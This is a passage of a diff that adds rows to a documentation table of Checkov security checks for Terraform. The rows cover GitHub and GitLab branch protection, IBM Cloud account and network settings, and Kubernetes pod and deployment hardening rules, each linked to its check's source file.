+| 1815 | CKV_GIT_6 | resource | github_branch_protection_v3 | Ensure GitHub branch protection rules requires signed commits | Terraform | [BranchProtectionRequireSignedCommits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/github/BranchProtectionRequireSignedCommits.py) |
+| 1816 | CKV2_GIT_1 | resource | github_repository | Ensure each Repository has branch protection associated | Terraform | [RepositoryHasBranchProtection.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/github/RepositoryHasBranchProtection.yaml) |
+| 1817 | CKV_GLB_1 | resource | gitlab_project | Ensure at least two approving reviews are required to merge a GitLab MR | Terraform | [RequireTwoApprovalsToMerge.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gitlab/RequireTwoApprovalsToMerge.py) |
+| 1818 | CKV_GLB_2 | resource | gitlab_branch_protection | Ensure GitLab branch protection rules does not allow force pushes | Terraform | [ForcePushDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gitlab/ForcePushDisabled.py) |
+| 1819 | CKV_GLB_3 | resource | gitlab_project | Ensure GitLab prevent secrets is enabled | Terraform | [PreventSecretsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gitlab/PreventSecretsEnabled.py) |
+| 1820 | CKV_GLB_4 | resource | gitlab_project | Ensure GitLab commits are signed | Terraform | [RejectUnsignedCommits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gitlab/RejectUnsignedCommits.py) |
+| 1821 | CKV2_IBM_1 | resource | ibm_is_lb | Ensure load balancer for VPC is private (disable public access) | Terraform | [IBM_LoadBalancerforVPCisPrivate.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/ibm/IBM_LoadBalancerforVPCisPrivate.yaml) |
+| 1822 | CKV2_IBM_2 | resource | ibm_is_vpc | Ensure VPC classic access is disabled | Terraform | [IBM_VPCclassicAccessIsDisabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/ibm/IBM_VPCclassicAccessIsDisabled.yaml) |
+| 1823 | CKV2_IBM_3 | resource | ibm_iam_account_settings | Ensure API key creation is restricted in account settings | Terraform | [IBM_RestrictAPIkeyCreationInAccountSettings.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/ibm/IBM_RestrictAPIkeyCreationInAccountSettings.yaml) |
+| 1824 | CKV2_IBM_4 | resource | ibm_iam_account_settings | Ensure Multi-Factor Authentication (MFA) is enabled at the account level | Terraform | [IBM_EnableMFAatAccountLevel.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/ibm/IBM_EnableMFAatAccountLevel.yaml) |
+| 1825 | CKV2_IBM_5 | resource | ibm_iam_account_settings | Ensure Service ID creation is restricted in account settings | Terraform | [IBM_RestrictServiceIDCreationInAccountSettings.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/ibm/IBM_RestrictServiceIDCreationInAccountSettings.yaml) |
+| 1826 | CKV2_IBM_6 | resource | ibm_database | Ensure Databases network access is restricted to a specific IP range | Terraform | [IBM_DatabasesNWaccessRestrictedToSpecificIPrange.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/ibm/IBM_DatabasesNWaccessRestrictedToSpecificIPrange.yaml) |
+| 1827 | CKV2_IBM_7 | resource | ibm_container_cluster | Ensure Kubernetes clusters are accessible by using private endpoint and NOT public endpoint | Terraform | [IBM_K8sClustersAccessibleViaPrivateEndPt.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/ibm/IBM_K8sClustersAccessibleViaPrivateEndPt.yaml) |
+| 1828 | CKV_K8S_1 | resource | kubernetes_pod_security_policy | Do not admit containers wishing to share the host process ID namespace | Terraform | [ShareHostPIDPSP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ShareHostPIDPSP.py) |
+| 1829 | CKV_K8S_2 | resource | kubernetes_pod_security_policy | Do not admit privileged containers | Terraform | [PrivilegedContainerPSP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/PrivilegedContainerPSP.py) |
+| 1830 | CKV_K8S_3 | resource | kubernetes_pod_security_policy | Do not admit containers wishing to share the host IPC namespace | Terraform | [ShareHostIPCPSP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ShareHostIPCPSP.py) |
+| 1831 | CKV_K8S_4 | resource | kubernetes_pod_security_policy | Do not admit containers wishing to share the host network namespace | Terraform | [SharedHostNetworkNamespacePSP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/SharedHostNetworkNamespacePSP.py) |
+| 1832 | CKV_K8S_5 | resource | kubernetes_pod_security_policy | Containers should not run with allowPrivilegeEscalation | Terraform | [AllowPrivilegeEscalationPSP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/AllowPrivilegeEscalationPSP.py) |
+| 1833 | CKV_K8S_6 | resource | kubernetes_pod_security_policy | Do not admit root containers | Terraform | [RootContainerPSP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/RootContainerPSP.py) |
+| 1834 | CKV_K8S_7 | resource | kubernetes_pod_security_policy | Do not admit containers with the NET_RAW capability | Terraform | [DropCapabilitiesPSP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DropCapabilitiesPSP.py) |
+| 1835 | CKV_K8S_8 | resource | kubernetes_deployment | Liveness Probe Should be Configured | Terraform | [LivenessProbe.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/LivenessProbe.py) |
+| 1836 | CKV_K8S_8 | resource | kubernetes_deployment_v1 | Liveness Probe Should be Configured | Terraform | [LivenessProbe.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/LivenessProbe.py) |
+| 1837 | CKV_K8S_8 | resource | kubernetes_pod | Liveness Probe Should be Configured | Terraform | [LivenessProbe.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/LivenessProbe.py) |
+| 1838 | CKV_K8S_8 | resource | kubernetes_pod_v1 | Liveness Probe Should be Configured | Terraform | [LivenessProbe.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/LivenessProbe.py) |
+| 1839 | CKV_K8S_9 | resource | kubernetes_deployment | Readiness Probe Should be Configured | Terraform | [ReadinessProbe.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ReadinessProbe.py) |
+| 1840 | CKV_K8S_9 | resource | kubernetes_deployment_v1 | Readiness Probe Should be Configured | Terraform | [ReadinessProbe.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ReadinessProbe.py) |
+| 1841 | CKV_K8S_9 | resource | kubernetes_pod | Readiness Probe Should be Configured | Terraform | [ReadinessProbe.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ReadinessProbe.py) |
+| 1842 | CKV_K8S_9 | resource | kubernetes_pod_v1 | Readiness Probe Should be Configured | Terraform | [ReadinessProbe.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ReadinessProbe.py) |
+| 1843 | CKV_K8S_10 | resource | kubernetes_deployment | CPU requests should be set | Terraform | [CPURequests.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/CPURequests.py) |
+| 1844 | CKV_K8S_10 | resource | kubernetes_deployment_v1 | CPU requests should be set | Terraform | [CPURequests.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/CPURequests.py) |
+| 1845 | CKV_K8S_10 | resource | kubernetes_pod | CPU requests should be set | Terraform | [CPURequests.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/CPURequests.py) |
+| 1846 | CKV_K8S_10 | resource | kubernetes_pod_v1 | CPU requests should be set | Terraform | [CPURequests.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/CPURequests.py) |
+| 1847 | CKV_K8S_11 | resource | kubernetes_deployment | CPU Limits should be set | Terraform | [CPULimits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/CPULimits.py) |
+| 1848 | CKV_K8S_11 | resource | kubernetes_deployment_v1 | CPU Limits should be set | Terraform | [CPULimits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/CPULimits.py) |
+| 1849 | CKV_K8S_11 | resource | kubernetes_pod | CPU Limits should be set | Terraform | [CPULimits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/CPULimits.py) |
+| 1850 | CKV_K8S_11 | resource | kubernetes_pod_v1 | CPU Limits should be set | Terraform | [CPULimits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/CPULimits.py) |
+| 1851 | CKV_K8S_12 | resource | kubernetes_deployment | Memory Limits should be set | Terraform | [MemoryLimits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/MemoryLimits.py) |
+| 1852 | CKV_K8S_12 | resource | kubernetes_deployment_v1 | Memory Limits should be set | Terraform | [MemoryLimits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/MemoryLimits.py) |
+| 1853 | CKV_K8S_12 | resource | kubernetes_pod | Memory Limits should be set | Terraform | [MemoryLimits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/MemoryLimits.py) |
+| 1854 | CKV_K8S_12 | resource | kubernetes_pod_v1 | Memory Limits should be set | Terraform | [MemoryLimits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/MemoryLimits.py) |
+| 1855 | CKV_K8S_13 | resource | kubernetes_deployment | Memory requests should be set | Terraform | [MemoryRequests.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/MemoryRequests.py) |
+| 1856 | CKV_K8S_13 | resource | kubernetes_deployment_v1 | Memory requests should be set | Terraform | [MemoryRequests.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/MemoryRequests.py) |
+| 1857 | CKV_K8S_13 | resource | kubernetes_pod | Memory requests should be set | Terraform | [MemoryRequests.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/MemoryRequests.py) |
+| 1858 | CKV_K8S_13 | resource | kubernetes_pod_v1 | Memory requests should be set | Terraform | [MemoryRequests.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/MemoryRequests.py) |
+| 1859 | CKV_K8S_14 | resource | kubernetes_deployment | Image Tag should be fixed - not latest or blank | Terraform | [ImageTagFixed.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ImageTagFixed.py) |
+| 1860 | CKV_K8S_14 | resource | kubernetes_deployment_v1 | Image Tag should be fixed - not latest or blank | Terraform | [ImageTagFixed.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ImageTagFixed.py) |
+| 1861 | CKV_K8S_14 | resource | kubernetes_pod | Image Tag should be fixed - not latest or blank | Terraform | [ImageTagFixed.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ImageTagFixed.py) |
+| 1862 | CKV_K8S_14 | resource | kubernetes_pod_v1 | Image Tag should be fixed - not latest or blank | Terraform | [ImageTagFixed.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ImageTagFixed.py) |
+| 1863 | CKV_K8S_15 | resource | kubernetes_deployment | Image Pull Policy should be Always | Terraform | [ImagePullPolicyAlways.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ImagePullPolicyAlways.py) |
+| 1864 | CKV_K8S_15 | resource | kubernetes_deployment_v1 | Image Pull Policy should be Always | Terraform | [ImagePullPolicyAlways.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ImagePullPolicyAlways.py) |
+| 1865 | CKV_K8S_15 | resource | kubernetes_pod | Image Pull Policy should be Always | Terraform | [ImagePullPolicyAlways.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ImagePullPolicyAlways.py) |
+| 1866 | CKV_K8S_15 | resource | kubernetes_pod_v1 | Image Pull Policy should be Always | Terraform | [ImagePullPolicyAlways.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ImagePullPolicyAlways.py) |
+| 1867 | CKV_K8S_16 | resource | kubernetes_deployment | Do not admit privileged containers | Terraform | [PrivilegedContainer.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/PrivilegedContainer.py) |
+| 1868 | CKV_K8S_16 | resource | kubernetes_deployment_v1 | Do not admit privileged containers | Terraform | [PrivilegedContainer.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/PrivilegedContainer.py) |
+| 1869 | CKV_K8S_16 | resource | kubernetes_pod | Do not admit privileged containers | Terraform | [PrivilegedContainer.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/PrivilegedContainer.py) |
+| 1870 | CKV_K8S_16 | resource | kubernetes_pod_v1 | Do not admit privileged containers | Terraform | [PrivilegedContainer.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/PrivilegedContainer.py) |
+| 1871 | CKV_K8S_17 | resource | kubernetes_deployment | Do not admit containers wishing to share the host process ID namespace | Terraform | [ShareHostPID.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ShareHostPID.py) |
+| 1872 | CKV_K8S_17 | resource | kubernetes_deployment_v1 | Do not admit containers wishing to share the host process ID namespace | Terraform | [ShareHostPID.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ShareHostPID.py) |
+| 1873 | CKV_K8S_17 | resource | kubernetes_pod | Do not admit containers wishing to share the host process ID namespace | Terraform | [ShareHostPID.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ShareHostPID.py) |
+| 1874 | CKV_K8S_17 | resource | kubernetes_pod_v1 | Do not admit containers wishing to share the host process ID namespace | Terraform | [ShareHostPID.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ShareHostPID.py) |
+| 1875 | CKV_K8S_18 | resource | kubernetes_deployment | Do not admit containers wishing to share the host IPC namespace | Terraform | [ShareHostIPC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ShareHostIPC.py) |
+| 1876 | CKV_K8S_18 | resource | kubernetes_deployment_v1 | Do not admit containers wishing to share the host IPC namespace | Terraform | [ShareHostIPC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ShareHostIPC.py) |
+| 1877 | CKV_K8S_18 | resource | kubernetes_pod | Do not admit containers wishing to share the host IPC namespace | Terraform | [ShareHostIPC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ShareHostIPC.py) |
+| 1878 | CKV_K8S_18 | resource | kubernetes_pod_v1 | Do not admit containers wishing to share the host IPC namespace | Terraform | [ShareHostIPC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ShareHostIPC.py) |
+| 1879 | CKV_K8S_19 | resource | kubernetes_deployment | Do not admit containers wishing to share the host network namespace | Terraform | [SharedHostNetworkNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/SharedHostNetworkNamespace.py) |
+| 1880 | CKV_K8S_19 | resource | kubernetes_deployment_v1 | Do not admit containers wishing to share the host network namespace | Terraform | [SharedHostNetworkNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/SharedHostNetworkNamespace.py) |
+| 1881 | CKV_K8S_19 | resource | kubernetes_pod | Do not admit containers wishing to share the host network namespace | Terraform | [SharedHostNetworkNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/SharedHostNetworkNamespace.py) |
+| 1882 | CKV_K8S_19 | resource | kubernetes_pod_v1 | Do not admit containers wishing to share the host network namespace | Terraform | [SharedHostNetworkNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/SharedHostNetworkNamespace.py) |
+| 1883 | CKV_K8S_20 | resource | kubernetes_deployment | Containers should not run with allowPrivilegeEscalation | Terraform | [AllowPrivilegeEscalation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/AllowPrivilegeEscalation.py) |
+| 1884 | CKV_K8S_20 | resource | kubernetes_deployment_v1 | Containers should not run with allowPrivilegeEscalation | Terraform | [AllowPrivilegeEscalation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/AllowPrivilegeEscalation.py) |
+| 1885 | CKV_K8S_20 | resource | kubernetes_pod | Containers should not run with allowPrivilegeEscalation | Terraform | [AllowPrivilegeEscalation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/AllowPrivilegeEscalation.py) |
+| 1886 | CKV_K8S_20 | resource | kubernetes_pod_v1 | Containers should not run with allowPrivilegeEscalation | Terraform | [AllowPrivilegeEscalation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/AllowPrivilegeEscalation.py) |
+| 1887 | CKV_K8S_21 | resource | kubernetes_config_map | The default namespace should not be used | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py) |
+| 1888 | CKV_K8S_21 | resource | kubernetes_config_map_v1 | The default namespace should not be used | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py) |
+| 1889 | CKV_K8S_21 | resource | kubernetes_cron_job | The default namespace should not be used | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py) |
+| 1890 | CKV_K8S_21 | resource | kubernetes_cron_job_v1 | The default namespace should not be used | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py) |
+| 1891 | CKV_K8S_21 | resource | kubernetes_daemon_set_v1 | The default namespace should not be used | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py) |
+| 1892 | CKV_K8S_21 | resource | kubernetes_daemonset | The default namespace should not be used | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py) |
+| 1893 | CKV_K8S_21 | resource | kubernetes_deployment | The default namespace should not be used | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py) |
+| 1894 | CKV_K8S_21 | resource | kubernetes_deployment_v1 | The default namespace should not be used | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py) |
+| 1895 | CKV_K8S_21 | resource | kubernetes_ingress | The default namespace should not be used | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py) |
+| 1896 | CKV_K8S_21 | resource | kubernetes_ingress_v1 | The default namespace should not be used | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py) |
+| 1897 | CKV_K8S_21 | resource | kubernetes_job | The default namespace should not be used | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py) |
+| 1898 | CKV_K8S_21 | resource | kubernetes_job_v1 | The default namespace should not be used | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py) |
+| 1899 | CKV_K8S_21 | resource | kubernetes_pod | The default namespace should not be used | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py) |
+| 1900 | CKV_K8S_21 | resource | kubernetes_pod_v1 | The default namespace should not be used | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py) |
+| 1901 | CKV_K8S_21 | resource | kubernetes_replication_controller | The default namespace should not be used | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py) |
+| 1902 | CKV_K8S_21 | resource | kubernetes_replication_controller_v1 | The default namespace should not be used | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py) |
+| 1903 | CKV_K8S_21 | resource | kubernetes_role_binding | The default namespace should not be used | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py) |
+| 1904 | CKV_K8S_21 | resource | kubernetes_role_binding_v1 | The default namespace should not be used | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py) |
+| 1905 | CKV_K8S_21 | resource | kubernetes_secret | The default namespace should not be used | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py) |
+| 1906 | CKV_K8S_21 | resource | kubernetes_secret_v1 | The default namespace should not be used | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py) |
+| 1907 | CKV_K8S_21 | resource | kubernetes_service | The default namespace should not be used | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py) |
+| 1908 | CKV_K8S_21 | resource | kubernetes_service_account | The default namespace should not be used | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py) |
+| 1909 | CKV_K8S_21 | resource | kubernetes_service_account_v1 | The default namespace should not be used | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py) |
+| 1910 | CKV_K8S_21 | resource | kubernetes_service_v1 | The default namespace should not be used | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py) |
+| 1911 | CKV_K8S_21 | resource | kubernetes_stateful_set | The default namespace should not be used | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py) |
+| 1912 | CKV_K8S_21 | resource | kubernetes_stateful_set_v1 | The default namespace should not be used | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py) |
+| 1913 | CKV_K8S_22 | resource | kubernetes_deployment | Use read-only filesystem for containers where possible | Terraform | [ReadonlyRootFilesystem.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ReadonlyRootFilesystem.py) |
+| 1914 | CKV_K8S_22 | resource | kubernetes_deployment_v1 | Use read-only filesystem for containers where possible | Terraform | [ReadonlyRootFilesystem.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ReadonlyRootFilesystem.py) |
+| 1915 | CKV_K8S_22 | resource | kubernetes_pod | Use read-only filesystem for containers where possible | Terraform | [ReadonlyRootFilesystem.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ReadonlyRootFilesystem.py) |
+| 1916 | CKV_K8S_22 | resource | kubernetes_pod_v1 | Use read-only filesystem for containers where possible | Terraform | [ReadonlyRootFilesystem.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ReadonlyRootFilesystem.py) |
+| 1917 | CKV_K8S_24 | resource | kubernetes_pod_security_policy | Do not allow containers with added capability | Terraform | [AllowedCapabilitiesPSP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/AllowedCapabilitiesPSP.py) |
+| 1918 | CKV_K8S_25 | resource | kubernetes_deployment | Minimize the admission of containers with added capability | Terraform | [AllowedCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/AllowedCapabilities.py) |
+| 1919 | CKV_K8S_25 | resource | kubernetes_deployment_v1 | Minimize the admission of containers with added capability | Terraform | [AllowedCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/AllowedCapabilities.py) |
+| 1920 | CKV_K8S_25 | resource | kubernetes_pod | Minimize the admission of containers with added capability | Terraform | [AllowedCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/AllowedCapabilities.py) |
+| 1921 | CKV_K8S_25 | resource | kubernetes_pod_v1 | Minimize the admission of containers with added capability | Terraform | [AllowedCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/AllowedCapabilities.py) |
+| 1922 | CKV_K8S_26 | resource | kubernetes_deployment | Do not specify hostPort unless absolutely necessary | Terraform | [HostPort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/HostPort.py) |
+| 1923 | CKV_K8S_26 | resource | kubernetes_deployment_v1 | Do not specify hostPort unless absolutely necessary | Terraform | [HostPort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/HostPort.py) |
+| 1924 | CKV_K8S_26 | resource | kubernetes_pod | Do not specify hostPort unless absolutely necessary | Terraform | [HostPort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/HostPort.py) |
+| 1925 | CKV_K8S_26 | resource | kubernetes_pod_v1 | Do not specify hostPort unless absolutely necessary | Terraform | [HostPort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/HostPort.py) |
+| 1926 | CKV_K8S_27 | resource | kubernetes_daemon_set_v1 | Do not expose the docker daemon socket to containers | Terraform | [DockerSocketVolume.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DockerSocketVolume.py) |
+| 1927 | CKV_K8S_27 | resource | kubernetes_daemonset | Do not expose the docker daemon socket to containers | Terraform | [DockerSocketVolume.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DockerSocketVolume.py) |
+| 1928 | CKV_K8S_27 | resource | kubernetes_deployment | Do not expose the docker daemon socket to containers | Terraform | [DockerSocketVolume.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DockerSocketVolume.py) |
+| 1929 | CKV_K8S_27 | resource | kubernetes_deployment_v1 | Do not expose the docker daemon socket to containers | Terraform | [DockerSocketVolume.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DockerSocketVolume.py) |
+| 1930 | CKV_K8S_27 | resource | kubernetes_pod | Do not expose the docker daemon socket to containers | Terraform | [DockerSocketVolume.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DockerSocketVolume.py) |
+| 1931 | CKV_K8S_27 | resource | kubernetes_pod_v1 | Do not expose the docker daemon socket to containers | Terraform | [DockerSocketVolume.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DockerSocketVolume.py) |
+| 1932 | CKV_K8S_28 | resource | kubernetes_deployment | Minimize the admission of containers with the NET_RAW capability | Terraform | [DropCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DropCapabilities.py) |
+| 1933 | CKV_K8S_28 | resource | kubernetes_deployment_v1 | Minimize the admission of containers with the NET_RAW capability | Terraform | [DropCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DropCapabilities.py) |
+| 1934 | CKV_K8S_28 | resource | kubernetes_pod | Minimize the admission of containers with the NET_RAW capability | Terraform | [DropCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DropCapabilities.py) |
